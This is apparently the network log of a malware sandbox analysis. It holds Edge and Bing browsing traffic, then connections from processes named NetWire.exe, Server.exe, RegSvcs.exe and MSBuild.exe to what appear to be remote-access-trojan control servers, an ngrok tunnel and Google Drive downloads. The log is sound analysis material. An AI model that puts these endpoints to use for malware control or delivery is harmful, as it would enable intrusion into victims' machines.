GET https://r.bing.com/rp/fdVZU4ttbw8NDRm6H3I5BW3_vCo.svg

HTTP Request

GET https://r.bing.com/rp/4L4QdyjTv0HYE2Ig2ol9eYoqxg8.svg

HTTP Request

GET https://r.bing.com/rp/UYtUYDcn1oZlFG-YfBPz59zejYI.svg

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/c4ruj6QGsmSnOG64gJJnnnYDa44.br.css

HTTP Request

GET https://r.bing.com/rp/5-y8FBmAkXLBZZghI-X94CRnsqg.br.css

HTTP Request

GET https://r.bing.com/rp/17Kbwo14aoBIPkSeISAgHKajyeA.br.css

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/vDjLjnEkXEuH2C8u3tT0A004qwQ.br.css

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=C6B6495D728647ADA3098FCFDAE1CBA9&CID=151CAB4AF5806A13125EBEE7F4A86B5E&TYPE=Event.ClientInst&DATA=%5B%7B%22correlationId%22%3A%2267d0f34ebdd34e04a70a09db64ac7e27%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.acclink%22%2C%22TS%22%3A1741747022963%2C%22Name%22%3A%22loadJsModule%22%2C%22FID%22%3A%22init%22%7D%2C%7B%22correlationId%22%3A%2267d0f34ebdd34e04a70a09db64ac7e27%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.acclink%22%2C%22TS%22%3A1741747022963%2C%22Name%22%3A%22undirectflow%22%2C%22FID%22%3A%22init%22%7D%2C%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.OpalUpsell%22%2C%22TS%22%3A1741747022980%2C%22Name%22%3A%22Show%22%2C%22FID%22%3A%22%22%7D%2C%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.OpalUpsell%22%2C%22TS%22%3A1741747022980%2C%22Name%22%3A%22ShowBubble%22%2C%22FID%22%3A%22%22%7D%2C%7B%22osBuildVersion%22%3A%5B%2210%22%2C%220%22%2C%2222000%22%5D%2C%22isWin11OrHigher%22%3A%22true%22%2C%22fullOsBuild%22%3A%2210.0.22000%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1741747022984%2C%22Name%22%3A%22OSBuild%22%2C%22FID%22%3A%22OSBuild%22%7D%2C%7B%22Namespace%22%3A%22SearchHarder%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1741747023063%2C%22Name%22%3A%22ButtonVisible%22%2C%22FID%22%3A%22SearchHarderEntryPoint%22%7D%2C%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Tab%22%2C%22TS%22%3A1741747023200%2C%22Name%22%3A%221%22%2C%22FID%22%3A%22count%22%7D%2C%7B%22ARElementIndex%22%3A0%2C%22ARElementOffsetTop%22%3A0%2C%22ARElementOffsetLeft%22%3A0%2C%22ARElementWidth%22%3A1072%2C%22ARElementHeight%22%3A463%2C%22ARElementDisplayed%22%3Atrue%2C%22ARElementKValue%22%3A%225137%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1741747023203%2C%22Name%22%3A%22ARElementLoad%22%2C%22FID%22%3A%22Magazine%22%7D%5D

HTTP Request

GET https://www.bing.com/rp/qZeFzs7d4zbqMjvSUX0ww-DN1bY.png

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=C6B6495D728647ADA3098FCFDAE1CBA9&CID=151CAB4AF5806A13125EBEE7F4A86B5E&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22thumb_tum2%22,%22SDK%22:%22SJ%22}]

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=C6B6495D728647ADA3098FCFDAE1CBA9&CID=151CAB4AF5806A13125EBEE7F4A86B5E&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22thumb_f2%22,%22SDK%22:%22SJ%22}]

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=C6B6495D728647ADA3098FCFDAE1CBA9&CID=151CAB4AF5806A13125EBEE7F4A86B5E&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22fdbkans_0%22,%22SDK%22:%22SJ%22}]

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=C6B6495D728647ADA3098FCFDAE1CBA9&CID=151CAB4AF5806A13125EBEE7F4A86B5E&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22sb_feedback%22,%22SDK%22:%22SJ%22}]

HTTP Response

200

HTTP Response

200

HTTP Request

POST https://www.bing.com/orgid/idtoken/conditional

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=C6B6495D728647ADA3098FCFDAE1CBA9&CID=151CAB4AF5806A13125EBEE7F4A86B5E&TYPE=Event.ClientInst&DATA=%5B%7B%22ARElementIndex%22%3A0%2C%22ARElementOffsetTop%22%3A16%2C%22ARElementOffsetLeft%22%3A0%2C%22ARElementWidth%22%3A648%2C%22ARElementHeight%22%3A200%2C%22ARElementDisplayed%22%3Atrue%2C%22ARElementKValue%22%3A%225169%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1741747023203%2C%22Name%22%3A%22ARElementLoad%22%2C%22FID%22%3A%22Magazine%22%7D%2C%7B%22ARElementIndex%22%3A1%2C%22ARElementOffsetTop%22%3A240%2C%22ARElementOffsetLeft%22%3A0%2C%22ARElementWidth%22%3A648%2C%22ARElementHeight%22%3A200%2C%22ARElementDisplayed%22%3Atrue%2C%22ARElementKValue%22%3A%225170%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1741747023203%2C%22Name%22%3A%22ARElementLoad%22%2C%22FID%22%3A%22Magazine%22%7D%2C%7B%22ARElementIndex%22%3A2%2C%22ARElementOffsetTop%22%3A16%2C%22ARElementOffsetLeft%22%3A672%2C%22ARElementWidth%22%3A536%2C%22ARElementHeight%22%3A424%2C%22ARElementDisplayed%22%3Atrue%2C%22ARElementKValue%22%3A%225171%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1741747023203%2C%22Name%22%3A%22ARElementLoad%22%2C%22FID%22%3A%22Magazine%22%7D%2C%7B%22AnswerCardVisibleIndex%22%3A0%2C%22AnswerCardKValue%22%3A%225169%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1741747023204%2C%22Name%22%3A%22AnswerCardLoad%22%2C%22FID%22%3A%22Magazine%22%7D%2C%7B%22AnswerCardVisibleIndex%22%3A1%2C%22AnswerCardKValue%22%3A%225171%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1741747023204%2C%22Name%22%3A%22AnswerCardLoad%22%2C%22FID%22%3A%22Magazine%22%7D%2C%7B%22AnswerCardVisibleIndex%22%3A2%2C%22AnswerCardKValue%22%3A%225170%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1741747023204%2C%22Name%22%3A%22AnswerCardLoad%22%2C%22FID%22%3A%22Magazine%22%7D%5D

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=C6B6495D728647ADA3098FCFDAE1CBA9&CID=151CAB4AF5806A13125EBEE7F4A86B5E&TYPE=Event.ClientInst&DATA=%5B%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1741747023457%2C%22Name%22%3A%22PromptDevLoc%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=C6B6495D728647ADA3098FCFDAE1CBA9&CID=151CAB4AF5806A13125EBEE7F4A86B5E&TYPE=Event.ClientInst&DATA=%5B%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1741747023457%2C%22Name%22%3A%22Perm_Available%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=C6B6495D728647ADA3098FCFDAE1CBA9&CID=151CAB4AF5806A13125EBEE7F4A86B5E&TYPE=Event.ClientInst&DATA=%5B%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.CookieGetBlocked%22%2C%22TS%22%3A1741747023458%2C%22Name%22%3A%22%22%2C%22FID%22%3A%22dsc%22%7D%2C%7B%22Text%22%3A%220%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1741747023481%2C%22Name%22%3A%22web%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%221%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1741747023481%2C%22Name%22%3A%22conv%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%222%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1741747023481%2C%22Name%22%3A%22images%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%223%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1741747023481%2C%22Name%22%3A%22video%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%224%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1741747023481%2C%22Name%22%3A%22local%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%225%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1741747023481%2C%22Name%22%3A%22news%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%226%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1741747023481%2C%22Name%22%3A%22shop%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%227%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1741747023481%2C%22Name%22%3A%22travelhub%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%228%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1741747023481%2C%22Name%22%3A%22flights%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%229%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1741747023481%2C%22Name%22%3A%22hotels%22%2C%22FID%22%3A%22DynScopeRank%22%7D%5D

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=C6B6495D728647ADA3098FCFDAE1CBA9&CID=151CAB4AF5806A13125EBEE7F4A86B5E&TYPE=Event.ClientInst&DATA=%5B%7B%22Fallback%22%3A%221%22%2C%22IsRewardUser%22%3A%22%22%2C%22IsAutoOpenFlyout%22%3A%22%22%2C%22SuppressionReason%22%3A%22NoTrigger%3AMuidTrialConfigDisabled%22%2C%22FID%22%3A%22ModernRewardsFlyout%22%2C%22EventName%22%3A%22AutoOpenFlyoutFired%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Init%22%2C%22TS%22%3A1741747023481%2C%22Name%22%3A%22AutoOpenFlyoutFired%22%7D%5D

HTTP Request

GET https://www.bing.com/geolocation/write?isBlocked=true&sid=24C008279C1E694D33C41D8A9D3668C7&clientsid=undefined

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=C6B6495D728647ADA3098FCFDAE1CBA9&CID=151CAB4AF5806A13125EBEE7F4A86B5E&TYPE=Event.ClientInst&DATA=%5B%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1741747023483%2C%22Name%22%3A%22Perm_Denied%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=C6B6495D728647ADA3098FCFDAE1CBA9&CID=151CAB4AF5806A13125EBEE7F4A86B5E&TYPE=Event.ClientInst&DATA=%5B%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1741747023483%2C%22Name%22%3A%22block%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=C6B6495D728647ADA3098FCFDAE1CBA9&CID=151CAB4AF5806A13125EBEE7F4A86B5E&TYPE=Event.ClientInst&DATA=%5B%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1741747023483%2C%22Name%22%3A%22tryBlock%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

HTTP Request

GET https://www.bing.com/sa/54406577/Blue/BlueIdentityDropdownRedirect_c.js

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://www.bing.com/Identity/Dropdown?n=1&IID=SERP.5069&IG=C6B6495D728647ADA3098FCFDAE1CBA9&ru=https%3A%2F%2Fwww.bing.com%2Fsearch%3Fq%3DEmail-Worm%252FScare.hta%26aqs%3Dedge..69i57j69i58.240747624j0j0%26FORM%3DANAB01%26PC%3DU531

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=C6B6495D728647ADA3098FCFDAE1CBA9&CID=151CAB4AF5806A13125EBEE7F4A86B5E&TYPE=Event.ClientInst&DATA=%5B%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.ASBundleLoad%22%2C%22TS%22%3A1741747023532%2C%22Name%22%3A%22AutoSuggestBootstrap%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22LoadTime%22%3A%22769.4999999948777%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.AutosuggestBootstrapLoaded%22%2C%22TS%22%3A1741747023535%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22LoadTime%22%3A%221842.4999999988358%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.AutosuggestJSBundleLoaded%22%2C%22TS%22%3A1741747023536%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1741747023581%2C%22Name%22%3A%22BlockSuccess%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://www.bing.com/secure/Passport.aspx?popup=1&ssl=1

HTTP Response

200

HTTP Request

GET https://www.bing.com/sa/54406577/Blue/HamburgerServicesHeaderFlyout_c.js

HTTP Response

200

HTTP Request

GET https://www.bing.com/hamburger/scfo?ver=54406577&q=Email-Worm%2FScare.hta&aqs=edge..69i57j69i58.240747624j0j0&FORM=ANAB01&PC=U531&IID=SERP.5068&IG=C6B6495D728647ADA3098FCFDAE1CBA9&fbnb=1&ru=https%3A%2F%2Fwww.bing.com%2Fsearch%3Fq%3DEmail-Worm%252FScare.hta%26aqs%3Dedge..69i57j69i58.240747624j0j0%26FORM%3DANAB01%26PC%3DU531

HTTP Response

200

HTTP Request

GET https://www.bing.com/rp/MnHJON9xUYXpg-poLvycfocMWOA.svg

HTTP Request

GET https://www.bing.com/rp/9roWR2D5ePtJMzD9tbaESvO2JXw.png

HTTP Request

GET https://www.bing.com/rp/R8ErSC7kK_3o4eRM-pP2JlReVkE.png

HTTP Request

GET https://www.bing.com/rp/1bS66LcKydbjw6xnNUaVfMtxlhg.png

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=C6B6495D728647ADA3098FCFDAE1CBA9&CID=151CAB4AF5806A13125EBEE7F4A86B5E&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22hb_feedback%22,%22SDK%22:%22SJ%22}]

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=C6B6495D728647ADA3098FCFDAE1CBA9&CID=151CAB4AF5806A13125EBEE7F4A86B5E&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.SRTH%22,%22FID%22:%22CI%22,%22Name%22:%22SRTHVS%22,%22Text%22:%221%22,%22SDK%22:%22SJ%22}]

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

POST https://www.bing.com/fd/ls/lsp.aspx

HTTP Response

204

HTTP Request

GET https://www.bing.com/th?id=OBFB.1B096C6DCB92C2B9A732929A92AF5585&pid=Fb&qlt=99&r=0

HTTP Request

GET https://www.bing.com/th?id=OBFB.1E928B2B86E3D4E8ED1D46B83E667303&pid=Fb&qlt=99&r=0

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://www.bing.com/ipv6test/test?FORM=MONITR

HTTP Response

200

HTTP Request

POST https://www.bing.com/fd/ls/lsp.aspx

HTTP Response

204

HTTP Request

POST https://www.bing.com/fd/ls/lsp.aspx

HTTP Response

204

HTTP Request

POST https://www.bing.com/fd/ls/lsp.aspx

HTTP Request

POST https://www.bing.com/fd/ls/lsp.aspx

HTTP Request

POST https://www.bing.com/fd/ls/lsp.aspx

HTTP Request

POST https://www.bing.com/fd/ls/lsp.aspx

HTTP Response

204

HTTP Response

204

HTTP Response

204

HTTP Response

204
95.101.143.219:443

th.bing.com

tls, http2

msedge.exe

1.0kB
5.2kB
9
12
88.221.135.33:443

r.bing.com

tls, http2

msedge.exe

1.1kB
5.1kB
11
11
88.221.135.33:443

https://r.bing.com/rp/2IvMOkolmNWKFKeQ0givgBwdh-o.br.js

tls, http2

msedge.exe

17.5kB
331.1kB
235
285

HTTP Request

GET https://r.bing.com/rp/4wjOZJjaSsgGGb1Dq7f4iHLH5Xs.br.css

HTTP Request

GET https://r.bing.com/rp/U6ozRLRanAQTt22qZDWCWxYnh5g.br.js

HTTP Request

GET https://r.bing.com/rp/E33oPkEFg94JdE52ibDzTAvMDO8.br.js

HTTP Request

GET https://r.bing.com/rp/KLrSbzDKMog0mCiPcB9iwoEvlE4.br.js

HTTP Request

GET https://r.bing.com/rp/TaNyfCzxqBX9l7QZbgZUegopTuI.br.js

HTTP Request

GET https://r.bing.com/rp/cfKt7bw67nxWZkkgOIRReDE3rQI.br.js

HTTP Request

GET https://r.bing.com/rp/LJBbk33xj0wpN1yZ2F5CHaTSir0.br.js

HTTP Request

GET https://r.bing.com/rp/6O1CvNJpGB5T4QGvosksEhnIbo4.br.js

HTTP Request

GET https://r.bing.com/rp/K3hC1_cQXGFr6cxRJVWYpzZJaAM.br.js

HTTP Request

GET https://r.bing.com/rp/n23ANye7L3wtUcgKxoGHb7_ezc4.br.js

HTTP Request

GET https://r.bing.com/rp/DmYomXZ0p9--syG1mm6CnQwvRHg.br.js

HTTP Request

GET https://r.bing.com/rp/bL7uhPj2SPbCSE6JNLGJunbq64E.br.js

HTTP Request

GET https://r.bing.com/rp/TjyWAmemrltxca9Tew0hTL__JHg.br.js

HTTP Request

GET https://r.bing.com/rp/lLk8XmbdNzzlnPRzVzDhaF9yjqw.br.js

HTTP Request

GET https://r.bing.com/rp/Gyuq2bqitqDJM0BeAkbKXGlQXNw.br.js

HTTP Request

GET https://r.bing.com/rp/n21aGRCN5EKHB3qObygw029dyNU.br.js

HTTP Request

GET https://r.bing.com/rp/PmNLAq2f0t_lcD3LTchFOVy6h-U.br.js

HTTP Request

GET https://r.bing.com/rp/8CgcSSLayxEVUBf0swP_bQGMId8.br.js

HTTP Request

GET https://r.bing.com/rp/V_fBQ_iVmAgE_Ta_T-6BNXc0ZY4.br.js

HTTP Request

GET https://r.bing.com/rp/9xGNA8UskvA9WHF58zbLOHZ5HvI.br.js

HTTP Request

GET https://r.bing.com/rp/_2I169N92jVtSc_VEsV0nma5sRY.br.js

HTTP Request

GET https://r.bing.com/rp/gKwIRAF4fg7noG1zyeUz8x3Jdhc.br.js

HTTP Request

GET https://r.bing.com/rp/zL4sntecq0RmP6dobtS9Rd5WRvU.br.js

HTTP Request

GET https://r.bing.com/rp/psgXZvzYJMEW2ydikIk493Va1d4.br.js

HTTP Request

GET https://r.bing.com/rp/5L3iD467J3iJWEPwIjxlK0MMDpY.br.js

HTTP Request

GET https://r.bing.com/rp/9Z2GyyGvsKSVNrmOMrTfcv8z_yQ.br.js

HTTP Request

GET https://r.bing.com/rp/dUzSc2TJEdHviToK914Fg1aekPA.br.js

HTTP Request

GET https://r.bing.com/rp/AzHQ2CGooV1DDs0SEYA1x4qElBY.br.js

HTTP Request

GET https://r.bing.com/rp/NfTD8Ovh04Y_Ni14YxqYB8R_2_Q.br.js

HTTP Request

GET https://r.bing.com/rp/uceaWoHkRefVM5EK1cFT2TcyRm0.br.js

HTTP Request

GET https://r.bing.com/rp/Nz3080e44w3456W4QiR1L5nz6Tg.br.js

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/Xz21jpkTfbBon6hHKW7e4R7Hl0U.br.js

HTTP Request

GET https://r.bing.com/rp/mOy7YpeLJ3c40BBAFNUI6SmOUTY.br.js

HTTP Request

GET https://r.bing.com/rp/6mZmj1db42G_jniFgdT7MCvBgyA.br.js

HTTP Request

GET https://r.bing.com/rp/iY8PAEydb3lbGfuJiuA9ICzXgY8.br.js

HTTP Request

GET https://r.bing.com/rp/UftfQbYuKvGGEUHPU3QGHYd90Z8.br.js

HTTP Request

GET https://r.bing.com/rp/zlfm-hC70pZAs62UVTTl3KShKOE.br.js

HTTP Request

GET https://r.bing.com/rp/WwTHOlBv_iLBpZXNWkp-HzVHgrM.br.js

HTTP Request

GET https://r.bing.com/rp/rWS0_tb2SOLTRkwVU0KG23fe_v0.br.js

HTTP Request

GET https://r.bing.com/rp/PUv5O8bgWg4WUC9qzYb6smNVm9w.br.js

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/RvRBoZ5KQDNHwbHfo-_ZBZIoYQo.br.js

HTTP Request

GET https://r.bing.com/rp/bzAVZoOHiaJeSbLoUcTPF4HPvJQ.br.js

HTTP Request

GET https://r.bing.com/rp/3s0czFTJyV5b3KCC7geWICWvvPs.br.js

HTTP Request

GET https://r.bing.com/rp/wNhUjm3kl_kvyfrio44J6j1zdYo.br.js

HTTP Request

GET https://r.bing.com/rp/8pMSnHJ05nB8bncpcC8ILnrRLFM.br.js

HTTP Request

GET https://r.bing.com/rp/JQLR-mMNuM8iGC3mnPsBx4hPzuo.br.js

HTTP Request

GET https://r.bing.com/rp/CcMXS8Oo0OUnUE0LzYK9AFJ6la8.br.js

HTTP Request

GET https://r.bing.com/rp/R5OIlHZUEYWuNhJa46yx5Wir2pM.br.js

HTTP Request

GET https://r.bing.com/rp/-gqBS9VzaGQOAafzweDVcqAD18I.br.js

HTTP Request

GET https://r.bing.com/rp/Ri3WNasD-kvXSKWETcNB7O-yYTs.br.js

HTTP Request

GET https://r.bing.com/rp/wJ4ypLxMemRfvxvJkUCpuYEBwew.br.js

HTTP Request

GET https://r.bing.com/rp/gfI083AUtzdZuPReAN6CvS-Ca98.br.js

HTTP Request

GET https://r.bing.com/rp/k_DNa1TDg1SFhPx_XEzMve_fpFM.br.js

HTTP Request

GET https://r.bing.com/rp/ztUh7qME7I8WPjdMsB8y8tLZ8s4.br.js

HTTP Request

GET https://r.bing.com/rp/O-ejpxJOK4ur1-qUtpPRk7Z6wj0.br.js

HTTP Request

GET https://r.bing.com/rp/4a2l6ts7ENpX5gGW0kp5U2iD6h8.br.js

HTTP Request

GET https://r.bing.com/rp/eKvcHdnNwo1WcxoSioV4ztnfZk8.br.js

HTTP Request

GET https://r.bing.com/rp/PUx-sNZ5_D-0sf742vcWqy9vjIU.br.js

HTTP Request

GET https://r.bing.com/rp/Sv8bO2oxkbGjZh6Pe_GKzG1DtDU.br.js

HTTP Request

GET https://r.bing.com/rp/-2EVJNDwymhr08bVch00GwpjiDA.br.js

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/lwgCOY8rCo0Ub0btSshwRlT9HWI.br.js

HTTP Request

GET https://r.bing.com/rp/ulJ3ckR0YcGpvIX6xhO4prJhEQQ.br.js

HTTP Request

GET https://r.bing.com/rp/ivu0QwP26BHIJjH_DSqboRdhsO0.br.js

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/YsQQp1g2KvEAqjj5BO1TXMGMrEU.br.js

HTTP Request

GET https://r.bing.com/rp/39Gh25aYvOpIn6855eS5x6cdVVY.br.js

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://r.bing.com/rp/NW_w0EXs3h3l9N3PeqyVuRIrqp8.br.js

HTTP Request

GET https://r.bing.com/rp/2IvMOkolmNWKFKeQ0givgBwdh-o.br.js

HTTP Response

200

HTTP Response

200
95.101.143.219:443

th.bing.com

tls, http2

msedge.exe

1.0kB
5.1kB
9
11
40.126.32.133:443

https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e34c7&response_type=id_token+code&nonce=71d0bb3f-38dd-4863-8639-f364e971946a&redirect_uri=https%3a%2f%2fwww.bing.com%2forgid%2fidtoken%2fconditional&scope=openid%20email%20profile%209ea1ad79-fdb6-4f9a-8bc3-2b70f96e34c7/.default&response_mode=form_post&instance_aware=true&msafed=0&prompt=none&state=%7b%22ig%22%3a%22C6B6495D728647ADA3098FCFDAE1CBA9%22%7d

tls, http2

msedge.exe

2.7kB
7.5kB
15
13

HTTP Request

GET https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e34c7&response_type=id_token+code&nonce=71d0bb3f-38dd-4863-8639-f364e971946a&redirect_uri=https%3a%2f%2fwww.bing.com%2forgid%2fidtoken%2fconditional&scope=openid%20email%20profile%209ea1ad79-fdb6-4f9a-8bc3-2b70f96e34c7/.default&response_mode=form_post&instance_aware=true&msafed=0&prompt=none&state=%7b%22ig%22%3a%22C6B6495D728647ADA3098FCFDAE1CBA9%22%7d

HTTP Response

200
3.12.245.36:19521

0.tcp.ngrok.io

RegSvcs.exe

260 B
200 B
5
5
193.161.193.99:22603

Server.exe

260 B
200 B
5
5
3.12.245.36:19521

0.tcp.ngrok.io

RegSvcs.exe

260 B
200 B
5
5
142.250.200.46:443

drive.google.com

tls

NetWire.exe

1.3kB
10.4kB
12
14
142.250.187.193:443

drive.usercontent.google.com

tls

NetWire.exe

1.1kB
8.8kB
12
13
193.161.193.99:22603

Server.exe

260 B
200 B
5
5
168.61.222.215:5400

MSBuild.exe

260 B
5
193.161.193.99:22603

Server.exe

260 B
200 B
5
5
3.12.245.36:19521

0.tcp.ngrok.io

RegSvcs.exe

260 B
200 B
5
5
193.161.193.99:22603

Server.exe

260 B
200 B
5
5
193.161.193.99:22603

Server.exe

260 B
200 B
5
5
193.161.193.99:22603

Server.exe

260 B
200 B
5
5
3.12.245.36:19521

0.tcp.ngrok.io

RegSvcs.exe

260 B
200 B
5
5
193.161.193.99:22603

Server.exe

260 B
200 B
5
5
193.161.193.99:22603

Server.exe

260 B
200 B
5
5
3.12.245.36:19521

0.tcp.ngrok.io

RegSvcs.exe

260 B
200 B
5
5
185.136.161.124:6128

dlrarhsiva.exe

260 B
5
193.161.193.99:22603

Server.exe

260 B
200 B
5
5
193.161.193.99:22603

Server.exe

260 B
200 B
5
5
3.12.245.36:19521

0.tcp.ngrok.io

RegSvcs.exe

260 B
200 B
5
5
193.161.193.99:22603

Server.exe

260 B
200 B
5
5
193.161.193.99:22603

Server.exe

260 B
200 B
5
5
52.109.76.243:443

https://roaming.officeapps.live.com/rs/RoamingSoapService.svc

tls, http

WINWORD.EXE

1.8kB
8.3kB
12
11

HTTP Request

